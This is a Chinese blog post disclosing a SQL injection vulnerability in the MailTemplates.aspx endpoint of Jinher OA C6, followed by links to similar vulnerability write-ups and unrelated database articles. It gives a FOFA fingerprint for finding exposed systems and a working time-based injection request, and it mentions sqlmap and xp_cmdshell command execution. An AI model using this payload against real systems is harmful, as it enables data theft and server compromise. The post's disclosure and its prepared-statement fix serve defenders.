金和OA C6 MailTemplates.aspx SQL注入漏洞

原创 已于 2024-01-09 09:58:54 修改 · 638 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #web安全 #网络安全 #安全

于 2024-01-09 09:58:38 首次发布
本文分析了金和OA协同办公管理系统中的SQL注入漏洞,指出攻击者可能获取敏感数据并植入木马。提出使用预编译语句进行安全修复的建议。

文章目录

产品简介

金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

漏洞概述

金和OA C6 MailTemplates.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

指纹识别

fofa:

app="金和网络-金和OA"

漏洞利用

poc:

GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1
Host: you_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

延迟3秒
在这里插入图片描述
sqlmap验证
在这里插入图片描述
利用xp_cmdshell执行命令
在这里插入图片描述

修复建议

sql语句使用预编译语句

【读书人读圣贤书,总得要比其他人多一些仁义道德。】

金和 OA C6/Control/GetSqlData.aspx/.ashx SQL 注入漏洞复现
0xSec
12-15 1283
金和 OA C6/Control/GetSqlData.aspx/.ashx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 MailTemplates.aspx SQL注入漏洞复现
0xSec
01-06 1022
金和OA C6 MailTemplates.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 MailTemplates.aspx sql注入漏洞
Keepb1ue的博客
01-05 2046
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 MailTemplates.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。资产测绘。
金和OA C6 DBModules.aspx SQL注入漏洞复现
0xSec
08-23 699
金和OA C6 DBModules.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 CarCardInfo.aspx SQL注入漏洞
3tefanie的博客
01-09 963
【情不知所起,一往而深,可惜大多由深转浅,相忘江湖。】
金和OA C6 RssModulesHttp.aspx SQL注入漏洞复现
0xSec
02-07 657
金和OAC6 RssModulesHttp.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 IncentivePlanFulfill.aspx SQL注入漏洞复现
qq_39894062的博客
03-27 229
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!金和OA C6 IncentivePlanFulfill.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA GetTreeDate.aspx SQL注入漏洞
xiaokp7的博客
09-22 756
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
金和OA C6 gethomeinfo sql注入漏洞
Keepb1ue的博客
12-25 2422
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 gethomeinfo接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 UploadFileEditor.aspx SQL注入漏洞复现
0xSec
08-16 427
金和OA C6 UploadFileEditor.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
PostgreSQL与MySQL选型对比
rchm8519的专栏
01-04 832
PostgreSQL与MySQL对比摘要:PostgreSQL适合复杂查询、高一致性及GIS应用,支持丰富数据类型和扩展功能;MySQL则在简单读写、云服务集成和主从复制上表现优异。选型关键因素包括:查询复杂度、数据模型、事务要求、团队经验和云服务需求。复杂业务推荐PostgreSQL,简单OLTP场景可选MySQL。混合架构可结合两者优势,最终应通过实际测试验证性能。建议不确定场景优先考虑PostgreSQL的功能超集特性。
PostgreSQL 中 nextval() 的线程安全性解析
Vic10101的博客
01-04 844
nextval()函数通过原子操作、内部锁机制和非事务性设计,确保了在并发环境下的线程安全性。这些机制使得nextval()在高并发场景下也能稳定地生成唯一的序列值,无需担心线程安全问题。同时,通过查询序列的元数据,我们可以在不改变序列当前状态的情况下,预览序列的下一个值。在 Java 应用程序中,无论是使用 JDBC 还是 ORM 框架,都可以方便地利用nextval()来生成唯一的序列值,从而确保数据的唯一性和一致性。希望本文能帮助你更好地理解和使用 PostgreSQL 的nextval()
关系型数据库、NoSQL、NewSQL 选型比对
weixin_44821805的博客
01-07 160
垂直扩展为主(升级硬件),水平扩展需分库分表(Sharding-JDBC/MyCat),复杂度高。支持复杂 SQL(JOIN / 子查询 / 事务),OLTP/OLAP 均能覆盖(需优化)灵活 Schema(文档 / 键值 / 列族 / 图)、弱 JOIN。非结构化数据、高并发读写、灵活扩展(日志 / 缓存 / 物联网)分布式并发(TiDB 集群 TPS 可达百万),支持高并发事务。结构化数据、强事务、复杂关联(订单 / 支付 / 用户系统)海量结构化数据、强事务、高并发(互联网核心业务 / 金融)
Docker 部署 PostgreSQL 数据库教程
java_logo的专栏
01-05 950
PostgreSQL 是一款开源免费的高级关系型数据库管理系统,始于 1986 年,由全球开发者社区持续维护迭代,兼具悠久历史与前沿特性。它严格遵循 ACID 事务原则,确保数据读写的一致性与可靠性,同时突破传统关系型数据库局限,支持多模型存储——既能兼容标准 SQL,又可高效处理 JSON、数组、地理空间(GIS)等复杂数据类型。
PostgreSQL -- 开源对象-关系型数据库
TwoYellowGuns的博客
01-04 1077
PostgreSQL(通常简称为 Postgres)是一个功能强大的开源对象-关系型数据库系统,以其稳定性、标准兼容性、可扩展性和丰富的功能而广受开发者和企业的青睐。
SQL MIN() 函数详解
froginwe11的博客
01-01 286
MIN()函数是SQL语言中非常实用的一个聚合函数,它可以帮助我们快速查询出数值列的最小值。通过本文的介绍,相信大家对MIN()函数有了更深入的了解。在实际应用中,灵活运用MIN()函数,并结合其他SQL技巧,可以帮助我们更好地完成数据查询和分析任务。
PostgreSQL的jsonb_object_agg函数的两种用法
l1t的专栏
01-04 254
摘要:本文演示了PostgreSQL中两种JSON聚合方法。第一种使用jsonb_object_agg将产品按类别聚合成键值对格式(如{"Laptop":1200}),第二种使用jsonb_agg和jsonb_build_object将每行记录转为JSON对象后聚合成数组。两种方法都能有效将关系型数据转换为JSON格式,执行时间均在毫秒级别,适用于不同场景下的数据转换需求。
浅谈Qt中的QSql模块整体设计
红军不怕远征难,万水千山只等闲
01-01 1247
Qt的QSql模块是Qt框架提供的数据库抽象层,旨在屏蔽不同数据库(如SQLite、MySQL等)的底层API差异,提供统一的操作接口。其核心设计包括三层架构:应用层调用API执行数据库操作,抽象接口层定义统一接口(如QSqlDatabase、QSqlQuery),驱动适配层通过插件机制适配具体数据库。QSql支持SQL执行、参数绑定、事务控制等功能,并与Qt的MVC组件深度整合。模块采用工厂模式、适配器模式等设计模式,确保扩展性和跨平台兼容性。开发者可通过自定义驱动和模型扩展功能,但需注意线程安全和性能优
通过 HeidiSQL 连接 CentOS 7 中的 MySQL 5.7
最新发布
BI
01-07 299
本文详细介绍了如何使用 HeidiSQL 客户端远程连接部署在 CentOS 7 上的 MySQL 5.7 数据库。教程涵盖了从获取服务器 IP、检查网络连通性、配置 MySQL 远程访问权限(创建用户及授权),到设置系统防火墙(firewalld)和云安全组端口(3306)的全过程。此外,文章还提供了针对修改 bind-address 及常见连接报错(如 Connection refused)的排查方法,帮助用户顺利搭建跨平台的数据库管理环境。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值